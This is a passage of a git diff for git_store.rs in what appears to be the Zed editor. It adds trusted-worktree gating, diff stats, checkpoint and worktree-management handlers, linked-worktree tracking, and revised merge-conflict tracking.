/// If it wasn't opened from the CLI, and an absolute path is given, then a shell is spawned in diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index 3113163cbaec65d7b439e0cbf46603d60ac3fae0..e7e84ffe673881d898a56b64892887b9c8d6c809 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -6,6 +6,9 @@ pub mod pending_op; use crate::{ ProjectEnvironment, ProjectItem, ProjectPath, buffer_store::{BufferStore, BufferStoreEvent}, + trusted_worktrees::{ + PathTrust, TrustedWorktrees, TrustedWorktreesEvent, TrustedWorktreesStore, + }, worktree_store::{WorktreeStore, WorktreeStoreEvent}, }; use anyhow::{Context as _, Result, anyhow, bail}; @@ -21,7 +24,7 @@ use futures::{ mpsc, oneshot::{self, Canceled}, }, - future::{self, Shared}, + future::{self, BoxFuture, Shared}, stream::FuturesOrdered, }; use git::{ @@ -31,13 +34,13 @@ use git::{ repository::{ Branch, CommitDetails, CommitDiff, CommitFile, CommitOptions, DiffType, FetchOptions, GitRepository, GitRepositoryCheckpoint, GraphCommitData, InitialGraphCommitData, LogOrder, - LogSource, PushOptions, Remote, RemoteCommandOutput, RepoPath, ResetMode, + LogSource, PushOptions, Remote, RemoteCommandOutput, RepoPath, ResetMode, SearchCommitArgs, UpstreamTrackingStatus, Worktree as GitWorktree, }, stash::{GitStash, StashEntry}, status::{ - DiffTreeType, FileStatus, GitSummary, StatusCode, TrackedStatus, TreeDiff, TreeDiffStatus, - UnmergedStatus, UnmergedStatusCode, + self, DiffStat, DiffTreeType, FileStatus, GitSummary, StatusCode, TrackedStatus, TreeDiff, + TreeDiffStatus, UnmergedStatus, UnmergedStatusCode, }, }; use gpui::{ @@ -72,7 +75,7 @@ use std::{ }, time::Instant, }; -use sum_tree::{Edit, SumTree, TreeSet}; +use sum_tree::{Edit, SumTree, TreeMap}; use task::Shell; use text::{Bias, BufferId}; use util::{ @@ -192,6 +195,7 @@ pub struct GitStoreCheckpoint { pub struct StatusEntry { pub repo_path: RepoPath, pub status: FileStatus, + pub diff_stat: Option, } impl 
StatusEntry { @@ -213,6 +217,8 @@ impl StatusEntry { repo_path: self.repo_path.to_proto(), simple_status, status: Some(status_to_proto(self.status)), + diff_stat_added: self.diff_stat.map(|ds| ds.added), + diff_stat_deleted: self.diff_stat.map(|ds| ds.deleted), } } } @@ -223,7 +229,15 @@ impl TryFrom for StatusEntry { fn try_from(value: proto::StatusEntry) -> Result { let repo_path = RepoPath::from_proto(&value.repo_path).context("invalid repo path")?; let status = status_from_proto(value.simple_status, value.status)?; - Ok(Self { repo_path, status }) + let diff_stat = match (value.diff_stat_added, value.diff_stat_deleted) { + (Some(added), Some(deleted)) => Some(DiffStat { added, deleted }), + _ => None, + }; + Ok(Self { + repo_path, + status, + diff_stat, + }) } } @@ -251,9 +265,8 @@ pub struct RepositoryId(pub u64); #[derive(Clone, Debug, Default, PartialEq, Eq)] pub struct MergeDetails { - pub conflicted_paths: TreeSet, + pub merge_heads_by_conflicted_path: TreeMap>>, pub message: Option, - pub heads: Vec>, } #[derive(Clone)] @@ -267,14 +280,21 @@ pub struct RepositorySnapshot { pub id: RepositoryId, pub statuses_by_path: SumTree, pub work_directory_abs_path: Arc, + /// The working directory of the original repository. For a normal + /// checkout this equals `work_directory_abs_path`. For a git worktree + /// checkout, this is the original repo's working directory — used to + /// anchor new worktree creation so they don't nest. 
+ pub original_repo_abs_path: Arc, pub path_style: PathStyle, pub branch: Option, + pub branch_list: Arc<[Branch]>, pub head_commit: Option, pub scan_id: u64, pub merge: MergeDetails, pub remote_origin_url: Option, pub remote_upstream_url: Option, pub stash_entries: GitStash, + pub linked_worktrees: Arc<[GitWorktree]>, } type JobId = u64; @@ -309,6 +329,12 @@ pub struct GraphDataResponse<'a> { pub error: Option, } +#[derive(Clone, Debug)] +enum CreateWorktreeStartPoint { + Detached, + Branched { name: String }, +} + pub struct Repository { this: WeakEntity, snapshot: RepositorySnapshot, @@ -350,6 +376,7 @@ impl LocalRepositoryState { dot_git_abs_path: Arc, project_environment: WeakEntity, fs: Arc, + is_trusted: bool, cx: &mut AsyncApp, ) -> anyhow::Result { let environment = project_environment @@ -377,6 +404,7 @@ impl LocalRepositoryState { } }) .await?; + backend.set_trusted(is_trusted); Ok(LocalRepositoryState { backend, environment: Arc::new(environment), @@ -407,9 +435,10 @@ pub enum GitGraphEvent { #[derive(Clone, Debug, PartialEq, Eq)] pub enum RepositoryEvent { StatusesChanged, - MergeHeadsChanged, - BranchChanged, + HeadChanged, + BranchListChanged, StashEntriesChanged, + GitWorktreeListChanged, PendingOpsChanged { pending_ops: SumTree }, GraphEvent((LogSource, LogOrder), GitGraphEvent), } @@ -492,11 +521,15 @@ impl GitStore { state: GitStoreState, cx: &mut Context, ) -> Self { - let _subscriptions = vec![ + let mut _subscriptions = vec![ cx.subscribe(&worktree_store, Self::on_worktree_store_event), cx.subscribe(&buffer_store, Self::on_buffer_store_event), ]; + if let Some(trusted_worktrees) = TrustedWorktrees::try_get_global(cx) { + _subscriptions.push(cx.subscribe(&trusted_worktrees, Self::on_trusted_worktrees_event)); + } + GitStore { state, buffer_store, @@ -535,6 +568,10 @@ impl GitStore { client.add_entity_request_handler(Self::handle_run_hook); client.add_entity_request_handler(Self::handle_reset); 
client.add_entity_request_handler(Self::handle_show); + client.add_entity_request_handler(Self::handle_create_checkpoint); + client.add_entity_request_handler(Self::handle_restore_checkpoint); + client.add_entity_request_handler(Self::handle_compare_checkpoints); + client.add_entity_request_handler(Self::handle_diff_checkpoints); client.add_entity_request_handler(Self::handle_load_commit_diff); client.add_entity_request_handler(Self::handle_file_history); client.add_entity_request_handler(Self::handle_checkout_files); @@ -543,7 +580,6 @@ impl GitStore { client.add_entity_request_handler(Self::handle_askpass); client.add_entity_request_handler(Self::handle_check_for_pushed_commits); client.add_entity_request_handler(Self::handle_git_diff); - client.add_entity_request_handler(Self::handle_git_diff_stat); client.add_entity_request_handler(Self::handle_tree_diff); client.add_entity_request_handler(Self::handle_get_blob_content); client.add_entity_request_handler(Self::handle_open_unstaged_diff); @@ -556,6 +592,9 @@ impl GitStore { client.add_entity_request_handler(Self::handle_git_clone); client.add_entity_request_handler(Self::handle_get_worktrees); client.add_entity_request_handler(Self::handle_create_worktree); + client.add_entity_request_handler(Self::handle_remove_worktree); + client.add_entity_request_handler(Self::handle_rename_worktree); + client.add_entity_request_handler(Self::handle_get_head_sha); } pub fn is_local(&self) -> bool { @@ -1506,20 +1545,35 @@ impl GitStore { } else if let UpdatedGitRepository { new_work_directory_abs_path: Some(work_directory_abs_path), dot_git_abs_path: Some(dot_git_abs_path), - repository_dir_abs_path: Some(_repository_dir_abs_path), - common_dir_abs_path: Some(_common_dir_abs_path), + repository_dir_abs_path: Some(repository_dir_abs_path), + common_dir_abs_path: Some(common_dir_abs_path), .. 
} = update { + let original_repo_abs_path: Arc = git::repository::original_repo_path( + work_directory_abs_path, + common_dir_abs_path, + repository_dir_abs_path, + ) + .into(); let id = RepositoryId(next_repository_id.fetch_add(1, atomic::Ordering::Release)); + let is_trusted = TrustedWorktrees::try_get_global(cx) + .map(|trusted_worktrees| { + trusted_worktrees.update(cx, |trusted_worktrees, cx| { + trusted_worktrees.can_trust(&self.worktree_store, worktree_id, cx) + }) + }) + .unwrap_or(false); let git_store = cx.weak_entity(); let repo = cx.new(|cx| { let mut repo = Repository::local( id, work_directory_abs_path.clone(), + original_repo_abs_path.clone(), dot_git_abs_path.clone(), project_environment.downgrade(), fs.clone(), + is_trusted, git_store, cx, ); @@ -1560,6 +1614,39 @@ impl GitStore { } } + fn on_trusted_worktrees_event( + &mut self, + _: Entity, + event: &TrustedWorktreesEvent, + cx: &mut Context, + ) { + if !matches!(self.state, GitStoreState::Local { .. }) { + return; + } + + let (is_trusted, event_paths) = match event { + TrustedWorktreesEvent::Trusted(_, trusted_paths) => (true, trusted_paths), + TrustedWorktreesEvent::Restricted(_, restricted_paths) => (false, restricted_paths), + }; + + for (repo_id, worktree_ids) in &self.worktree_ids { + if worktree_ids + .iter() + .any(|worktree_id| event_paths.contains(&PathTrust::Worktree(*worktree_id))) + { + if let Some(repo) = self.repositories.get(repo_id) { + let repository_state = repo.read(cx).repository_state.clone(); + cx.background_spawn(async move { + if let Ok(RepositoryState::Local(state)) = repository_state.await { + state.backend.set_trusted(is_trusted); + } + }) + .detach(); + } + } + } + } + fn on_buffer_store_event( &mut self, _: Entity, @@ -1725,6 +1812,26 @@ impl GitStore { &self.repositories } + /// Returns the original (main) repository working directory for the given worktree. 
+ /// For normal checkouts this equals the worktree's own path; for linked + /// worktrees it points back to the original repo. + pub fn original_repo_path_for_worktree( + &self, + worktree_id: WorktreeId, + cx: &App, + ) -> Option> { + self.active_repo_id + .iter() + .chain(self.worktree_ids.keys()) + .find(|repo_id| { + self.worktree_ids + .get(repo_id) + .is_some_and(|ids| ids.contains(&worktree_id)) + }) + .and_then(|repo_id| self.repositories.get(repo_id)) + .map(|repo| repo.read(cx).snapshot().original_repo_abs_path) + } + pub fn status_for_buffer_id(&self, buffer_id: BufferId, cx: &App) -> Option { let (repo, path) = self.repository_and_path_for_buffer_id(buffer_id, cx)?; let status = repo.read(cx).snapshot.status_for_path(&path)?; @@ -1842,6 +1949,11 @@ impl GitStore { let id = RepositoryId::from_proto(update.id); let client = this.upstream_client().context("no upstream client")?; + let original_repo_abs_path: Option> = update + .original_repo_abs_path + .as_deref() + .map(|p| Path::new(p).into()); + let mut repo_subscription = None; let repo = this.repositories.entry(id).or_insert_with(|| { let git_store = cx.weak_entity(); @@ -1849,6 +1961,7 @@ impl GitStore { Repository::remote( id, Path::new(&update.abs_path).into(), + original_repo_abs_path.clone(), path_style, ProjectId(update.project_id), client, @@ -2234,6 +2347,7 @@ impl GitStore { CommitOptions { amend: options.amend, signoff: options.signoff, + allow_empty: options.allow_empty, }, askpass, cx, @@ -2300,18 +2414,77 @@ impl GitStore { let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; let directory = PathBuf::from(envelope.payload.directory); - let name = envelope.payload.name; + let start_point = if envelope.payload.name.is_empty() { + CreateWorktreeStartPoint::Detached + } else { + CreateWorktreeStartPoint::Branched { + name: envelope.payload.name, + } + }; let commit = 
envelope.payload.commit; repository_handle .update(&mut cx, |repository_handle, _| { - repository_handle.create_worktree(name, directory, commit) + repository_handle.create_worktree_with_start_point(start_point, directory, commit) + }) + .await??; + + Ok(proto::Ack {}) + } + + async fn handle_remove_worktree( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + let path = PathBuf::from(envelope.payload.path); + let force = envelope.payload.force; + + repository_handle + .update(&mut cx, |repository_handle, _| { + repository_handle.remove_worktree(path, force) + }) + .await??; + + Ok(proto::Ack {}) + } + + async fn handle_rename_worktree( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + let old_path = PathBuf::from(envelope.payload.old_path); + let new_path = PathBuf::from(envelope.payload.new_path); + + repository_handle + .update(&mut cx, |repository_handle, _| { + repository_handle.rename_worktree(old_path, new_path) }) .await??; Ok(proto::Ack {}) } + async fn handle_get_head_sha( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let head_sha = repository_handle + .update(&mut cx, |repository_handle, _| repository_handle.head_sha()) + .await??; + + Ok(proto::GitGetHeadShaResponse { sha: head_sha }) + } + async fn handle_get_branches( this: Entity, envelope: TypedEnvelope, @@ -2429,11 +2602,12 @@ impl GitStore { ) -> Result { let repository_id = 
RepositoryId::from_proto(envelope.payload.repository_id); let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + let is_remote = envelope.payload.is_remote; let branch_name = envelope.payload.branch_name; repository_handle .update(&mut cx, |repository_handle, _| { - repository_handle.delete_branch(branch_name) + repository_handle.delete_branch(is_remote, branch_name) }) .await??; @@ -2480,6 +2654,92 @@ impl GitStore { }) } + async fn handle_create_checkpoint( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let checkpoint = repository_handle + .update(&mut cx, |repository, _| repository.checkpoint()) + .await??; + + Ok(proto::GitCreateCheckpointResponse { + commit_sha: checkpoint.commit_sha.as_bytes().to_vec(), + }) + } + + async fn handle_restore_checkpoint( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let checkpoint = GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&envelope.payload.commit_sha)?, + }; + + repository_handle + .update(&mut cx, |repository, _| { + repository.restore_checkpoint(checkpoint) + }) + .await??; + + Ok(proto::Ack {}) + } + + async fn handle_compare_checkpoints( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let left = GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&envelope.payload.left_commit_sha)?, + }; + let right = GitRepositoryCheckpoint { + commit_sha: 
Oid::from_bytes(&envelope.payload.right_commit_sha)?, + }; + + let equal = repository_handle + .update(&mut cx, |repository, _| { + repository.compare_checkpoints(left, right) + }) + .await??; + + Ok(proto::GitCompareCheckpointsResponse { equal }) + } + + async fn handle_diff_checkpoints( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result { + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + + let base = GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&envelope.payload.base_commit_sha)?, + }; + let target = GitRepositoryCheckpoint { + commit_sha: Oid::from_bytes(&envelope.payload.target_commit_sha)?, + }; + + let diff = repository_handle + .update(&mut cx, |repository, _| { + repository.diff_checkpoints(base, target) + }) + .await??; + + Ok(proto::GitDiffCheckpointsResponse { diff }) + } + async fn handle_load_commit_diff( this: Entity, envelope: TypedEnvelope, @@ -2699,45 +2959,6 @@ impl GitStore { Ok(proto::GitDiffResponse { diff }) } - async fn handle_git_diff_stat( - this: Entity, - envelope: TypedEnvelope, - mut cx: AsyncApp, - ) -> Result { - let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); - let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; - let diff_type = match envelope.payload.diff_type() { - proto::git_diff_stat::DiffType::HeadToIndex => DiffType::HeadToIndex, - proto::git_diff_stat::DiffType::HeadToWorktree => DiffType::HeadToWorktree, - proto::git_diff_stat::DiffType::MergeBase => { - let base_ref = envelope - .payload - .merge_base_ref - .ok_or_else(|| anyhow!("merge_base_ref is required for MergeBase diff type"))?; - DiffType::MergeBase { - base_ref: base_ref.into(), - } - } - }; - - let stats = repository_handle - .update(&mut cx, |repository_handle, cx| { - repository_handle.diff_stat(diff_type, cx) - }) - .await??; - - let entries = 
stats - .into_iter() - .map(|(path, stat)| proto::GitDiffStatEntry { - path: path.to_proto(), - added: stat.added, - deleted: stat.deleted, - }) - .collect(); - - Ok(proto::GitDiffStatResponse { entries }) - } - async fn handle_tree_diff( this: Entity, request: TypedEnvelope, @@ -3483,18 +3704,27 @@ impl RepositoryId { } impl RepositorySnapshot { - fn empty(id: RepositoryId, work_directory_abs_path: Arc, path_style: PathStyle) -> Self { + fn empty( + id: RepositoryId, + work_directory_abs_path: Arc, + original_repo_abs_path: Option>, + path_style: PathStyle, + ) -> Self { Self { id, statuses_by_path: Default::default(), + original_repo_abs_path: original_repo_abs_path + .unwrap_or_else(|| work_directory_abs_path.clone()), work_directory_abs_path, branch: None, + branch_list: Arc::from([]), head_commit: None, scan_id: 0, merge: Default::default(), remote_origin_url: None, remote_upstream_url: None, stash_entries: Default::default(), + linked_worktrees: Arc::from([]), path_style, } } @@ -3511,9 +3741,9 @@ impl RepositorySnapshot { removed_statuses: Default::default(), current_merge_conflicts: self .merge - .conflicted_paths + .merge_heads_by_conflicted_path .iter() - .map(|repo_path| repo_path.to_proto()) + .map(|(repo_path, _)| repo_path.to_proto()) .collect(), merge_message: self.merge.message.as_ref().map(|msg| msg.to_string()), project_id, @@ -3530,6 +3760,14 @@ impl RepositorySnapshot { .collect(), remote_upstream_url: self.remote_upstream_url.clone(), remote_origin_url: self.remote_origin_url.clone(), + original_repo_abs_path: Some( + self.original_repo_abs_path.to_string_lossy().into_owned(), + ), + linked_worktrees: self + .linked_worktrees + .iter() + .map(worktree_to_proto) + .collect(), } } @@ -3551,7 +3789,9 @@ impl RepositorySnapshot { current_new_entry = new_statuses.next(); } Ordering::Equal => { - if new_entry.status != old_entry.status { + if new_entry.status != old_entry.status + || new_entry.diff_stat != old_entry.diff_stat + { 
updated_statuses.push(new_entry.to_proto()); } current_old_entry = old_statuses.next(); @@ -3582,9 +3822,9 @@ impl RepositorySnapshot { removed_statuses, current_merge_conflicts: self .merge - .conflicted_paths + .merge_heads_by_conflicted_path .iter() - .map(|path| path.to_proto()) + .map(|(path, _)| path.to_proto()) .collect(), merge_message: self.merge.message.as_ref().map(|msg| msg.to_string()), project_id, @@ -3601,9 +3841,40 @@ impl RepositorySnapshot { .collect(), remote_upstream_url: self.remote_upstream_url.clone(), remote_origin_url: self.remote_origin_url.clone(), + original_repo_abs_path: Some( + self.original_repo_abs_path.to_string_lossy().into_owned(), + ), + linked_worktrees: self + .linked_worktrees + .iter() + .map(worktree_to_proto) + .collect(), } } + /// The main worktree is the original checkout that other worktrees were + /// created from. + /// + /// For example, if you had both `~/code/zed` and `~/code/worktrees/zed-2`, + /// then `~/code/zed` is the main worktree and `~/code/worktrees/zed-2` is a linked worktree. + /// + /// Submodules also return `true` here, since they are not linked worktrees. + pub fn is_main_worktree(&self) -> bool { + self.work_directory_abs_path == self.original_repo_abs_path + } + + /// Returns true if this repository is a linked worktree, that is, one that + /// was created from another worktree. + /// + /// Returns `false` for both the main worktree and submodules. 
+ pub fn is_linked_worktree(&self) -> bool { + !self.is_main_worktree() + } + + pub fn linked_worktrees(&self) -> &[GitWorktree] { + &self.linked_worktrees + } + pub fn status(&self) -> impl Iterator + '_ { self.statuses_by_path.iter().cloned() } @@ -3618,6 +3889,12 @@ impl RepositorySnapshot { .cloned() } + pub fn diff_stat_for_path(&self, path: &RepoPath) -> Option { + self.statuses_by_path + .get(&PathKey(path.as_ref().clone()), ()) + .and_then(|entry| entry.diff_stat) + } + pub fn abs_path_to_repo_path(&self, abs_path: &Path) -> Option { Self::abs_path_to_repo_path_inner(&self.work_directory_abs_path, abs_path, self.path_style) } @@ -3640,12 +3917,16 @@ impl RepositorySnapshot { } pub fn had_conflict_on_last_merge_head_change(&self, repo_path: &RepoPath) -> bool { - self.merge.conflicted_paths.contains(repo_path) + self.merge + .merge_heads_by_conflicted_path + .contains_key(repo_path) } pub fn has_conflict(&self, repo_path: &RepoPath) -> bool { - let had_conflict_on_last_merge_head_change = - self.merge.conflicted_paths.contains(repo_path); + let had_conflict_on_last_merge_head_change = self + .merge + .merge_heads_by_conflicted_path + .contains_key(repo_path); let has_conflict_currently = self .status_for_path(repo_path) .is_some_and(|entry| entry.status.is_conflicted()); @@ -3684,13 +3965,13 @@ pub fn proto_to_stash(entry: &proto::StashEntry) -> Result { } impl MergeDetails { - async fn load( + async fn update( + &mut self, backend: &Arc, - status: &SumTree, - prev_snapshot: &RepositorySnapshot, - ) -> Result<(MergeDetails, bool)> { + current_conflicted_paths: Vec, + ) -> Result { log::debug!("load merge details"); - let message = backend.merge_message().await; + self.message = backend.merge_message().await.map(SharedString::from); let heads = backend .revparse_batch(vec![ "MERGE_HEAD".into(), @@ -3705,48 +3986,42 @@ impl MergeDetails { .into_iter() .map(|opt| opt.map(SharedString::from)) .collect::>(); - let merge_heads_changed = heads != 
prev_snapshot.merge.heads; - let conflicted_paths = if merge_heads_changed { - let current_conflicted_paths = TreeSet::from_ordered_entries( - status - .iter() - .filter(|entry| entry.status.is_conflicted()) - .map(|entry| entry.repo_path.clone()), - ); - // It can happen that we run a scan while a lengthy merge is in progress - // that will eventually result in conflicts, but before those conflicts - // are reported by `git status`. Since for the moment we only care about - // the merge heads state for the purposes of tracking conflicts, don't update - // this state until we see some conflicts. - if heads.iter().any(Option::is_some) - && !prev_snapshot.merge.heads.iter().any(Option::is_some) - && current_conflicted_paths.is_empty() - { - log::debug!("not updating merge heads because no conflicts found"); - return Ok(( - MergeDetails { - message: message.map(SharedString::from), - ..prev_snapshot.merge.clone() - }, - false, - )); + let mut conflicts_changed = false; + + // Record the merge state for newly conflicted paths + for path in ¤t_conflicted_paths { + if self.merge_heads_by_conflicted_path.get(&path).is_none() { + conflicts_changed = true; + self.merge_heads_by_conflicted_path + .insert(path.clone(), heads.clone()); } + } - current_conflicted_paths - } else { - prev_snapshot.merge.conflicted_paths.clone() - }; - let details = MergeDetails { - conflicted_paths, - message: message.map(SharedString::from), - heads, - }; - Ok((details, merge_heads_changed)) + // Clear state for paths that are no longer conflicted and for which the merge heads have changed + self.merge_heads_by_conflicted_path + .retain(|path, old_merge_heads| { + let keep = current_conflicted_paths.contains(path) + || (old_merge_heads == &heads + && old_merge_heads.iter().any(|head| head.is_some())); + if !keep { + conflicts_changed = true; + } + keep + }); + + Ok(conflicts_changed) } } impl Repository { + pub fn is_trusted(&self) -> bool { + match self.repository_state.peek() { + 
Some(Ok(RepositoryState::Local(state))) => state.backend.is_trusted(), + _ => false, + } + } + pub fn snapshot(&self) -> RepositorySnapshot { self.snapshot.clone() } @@ -3768,14 +4043,20 @@ impl Repository { fn local( id: RepositoryId, work_directory_abs_path: Arc, + original_repo_abs_path: Arc, dot_git_abs_path: Arc, project_environment: WeakEntity, fs: Arc, + is_trusted: bool, git_store: WeakEntity, cx: &mut Context, ) -> Self { - let snapshot = - RepositorySnapshot::empty(id, work_directory_abs_path.clone(), PathStyle::local()); + let snapshot = RepositorySnapshot::empty( + id, + work_directory_abs_path.clone(), + Some(original_repo_abs_path), + PathStyle::local(), + ); let state = cx .spawn(async move |_, cx| { LocalRepositoryState::new( @@ -3783,6 +4064,7 @@ impl Repository { dot_git_abs_path, project_environment, fs, + is_trusted, cx, ) .await @@ -3798,11 +4080,17 @@ impl Repository { .shared(); cx.subscribe_self(move |this, event: &RepositoryEvent, _| match event { - RepositoryEvent::BranchChanged | RepositoryEvent::MergeHeadsChanged => { + RepositoryEvent::HeadChanged | RepositoryEvent::BranchListChanged => { if this.scan_id > 1 { this.initial_graph_data.clear(); } } + RepositoryEvent::StashEntriesChanged => { + if this.scan_id > 1 { + this.initial_graph_data + .retain(|(log_source, _), _| *log_source != LogSource::All); + } + } _ => {} }) .detach(); @@ -3829,13 +4117,19 @@ impl Repository { fn remote( id: RepositoryId, work_directory_abs_path: Arc, + original_repo_abs_path: Option>, path_style: PathStyle, project_id: ProjectId, client: AnyProtoClient, git_store: WeakEntity, cx: &mut Context, ) -> Self { - let snapshot = RepositorySnapshot::empty(id, work_directory_abs_path, path_style); + let snapshot = RepositorySnapshot::empty( + id, + work_directory_abs_path, + original_repo_abs_path, + path_style, + ); let repository_state = RemoteRepositoryState { project_id, client }; let job_sender = Self::spawn_remote_git_worker(repository_state.clone(), cx); let 
repository_state = Task::ready(Ok(RepositoryState::Remote(repository_state))).shared(); @@ -4107,6 +4401,10 @@ impl Repository { self.snapshot.status() } + pub fn diff_stat_for_path(&self, path: &RepoPath) -> Option { + self.snapshot.diff_stat_for_path(path) + } + pub fn cached_stash(&self) -> GitStash { self.snapshot.stash_entries.clone() } @@ -4426,6 +4724,32 @@ impl Repository { self.initial_graph_data.get(&(log_source, log_order)) } + pub fn search_commits( + &mut self, + log_source: LogSource, + search_args: SearchCommitArgs, + request_tx: smol::channel::Sender, + cx: &mut Context, + ) { + let repository_state = self.repository_state.clone(); + + cx.background_spawn(async move { + let repo_state = repository_state.await; + + match repo_state { + Ok(RepositoryState::Local(LocalRepositoryState { backend, .. })) => { + backend + .search_commits(log_source, search_args, request_tx) + .await + .log_err(); + } + Ok(RepositoryState::Remote(_)) => {} + Err(_) => {} + }; + }) + .detach(); + } + pub fn graph_data( &mut self, log_source: LogSource, @@ -4529,12 +4853,11 @@ impl Repository { .commit_oid_to_index .insert(commit_data.sha, graph_data.commit_data.len()); graph_data.commit_data.push(commit_data); - - cx.emit(RepositoryEvent::GraphEvent( - graph_data_key.clone(), - GitGraphEvent::CountUpdated(graph_data.commit_data.len()), - )); } + cx.emit(RepositoryEvent::GraphEvent( + graph_data_key.clone(), + GitGraphEvent::CountUpdated(graph_data.commit_data.len()), + )); }); match &graph_data { @@ -4896,47 +5219,73 @@ impl Repository { } pub fn stage_all(&mut self, cx: &mut Context) -> Task> { - let to_stage = self - .cached_status() - .filter_map(|entry| { - if let Some(ops) = self.pending_ops_for_path(&entry.repo_path) { - if ops.staging() || ops.staged() { + let snapshot = self.snapshot.clone(); + let pending_ops = self.pending_ops.clone(); + let to_stage = cx.background_spawn(async move { + snapshot + .status() + .filter_map(|entry| { + if let Some(ops) = + 
pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ()) + { + if ops.staging() || ops.staged() { + None + } else { + Some(entry.repo_path) + } + } else if entry.status.staging().is_fully_staged() { None } else { Some(entry.repo_path) } - } else if entry.status.staging().is_fully_staged() { - None - } else { - Some(entry.repo_path) - } - }) - .collect(); - self.stage_or_unstage_entries(true, to_stage, cx) + }) + .collect() + }); + + cx.spawn(async move |this, cx| { + let to_stage = to_stage.await; + this.update(cx, |this, cx| { + this.stage_or_unstage_entries(true, to_stage, cx) + })? + .await + }) } pub fn unstage_all(&mut self, cx: &mut Context) -> Task> { - let to_unstage = self - .cached_status() - .filter_map(|entry| { - if let Some(ops) = self.pending_ops_for_path(&entry.repo_path) { - if !ops.staging() && !ops.staged() { + let snapshot = self.snapshot.clone(); + let pending_ops = self.pending_ops.clone(); + let to_unstage = cx.background_spawn(async move { + snapshot + .status() + .filter_map(|entry| { + if let Some(ops) = + pending_ops.get(&PathKey(entry.repo_path.as_ref().clone()), ()) + { + if !ops.staging() && !ops.staged() { + None + } else { + Some(entry.repo_path) + } + } else if entry.status.staging().is_fully_unstaged() { None } else { Some(entry.repo_path) } - } else if entry.status.staging().is_fully_unstaged() { - None - } else { - Some(entry.repo_path) - } - }) - .collect(); - self.stage_or_unstage_entries(false, to_unstage, cx) - } + }) + .collect() + }); - pub fn stash_all(&mut self, cx: &mut Context) -> Task> { - let to_stash = self.cached_status().map(|entry| entry.repo_path).collect(); + cx.spawn(async move |this, cx| { + let to_unstage = to_unstage.await; + this.update(cx, |this, cx| { + this.stage_or_unstage_entries(false, to_unstage, cx) + })? 
+ .await + }) + } + + pub fn stash_all(&mut self, cx: &mut Context) -> Task> { + let to_stash = self.cached_status().map(|entry| entry.repo_path).collect(); self.stash_entries(to_stash, cx) } @@ -4967,8 +5316,7 @@ impl Repository { .map(|repo_path| repo_path.to_proto()) .collect(), }) - .await - .context("sending stash request")?; + .await?; Ok(()) } } @@ -5174,11 +5522,11 @@ impl Repository { options: Some(proto::commit::CommitOptions { amend: options.amend, signoff: options.signoff, + allow_empty: options.allow_empty, }), askpass_id, }) - .await - .context("sending commit request")?; + .await?; Ok(()) } @@ -5217,8 +5565,7 @@ impl Repository { askpass_id, remote: fetch_options.to_proto(), }) - .await - .context("sending fetch request")?; + .await?; Ok(RemoteCommandOutput { stdout: response.stdout, @@ -5286,7 +5633,7 @@ impl Repository { log::info!("head branch after scan is {branch:?}"); let snapshot = this.update(&mut cx, |this, cx| { this.snapshot.branch = branch; - cx.emit(RepositoryEvent::BranchChanged); + cx.emit(RepositoryEvent::HeadChanged); this.snapshot.clone() })?; if let Some(updates_tx) = updates_tx { @@ -5319,8 +5666,7 @@ impl Repository { } as i32), }) - .await - .context("sending push request")?; + .await?; Ok(RemoteCommandOutput { stdout: response.stdout, @@ -5386,8 +5732,7 @@ impl Repository { branch_name: branch.as_ref().map(|b| b.to_string()), remote_name: remote.to_string(), }) - .await - .context("sending pull request")?; + .await?; Ok(RemoteCommandOutput { stdout: response.stdout, @@ -5607,6 +5952,31 @@ impl Repository { }) } + /// If this is a linked worktree (*NOT* the main checkout of a repository), + /// returns the pathed for the linked worktree. + /// + /// Returns None if this is the main checkout. 
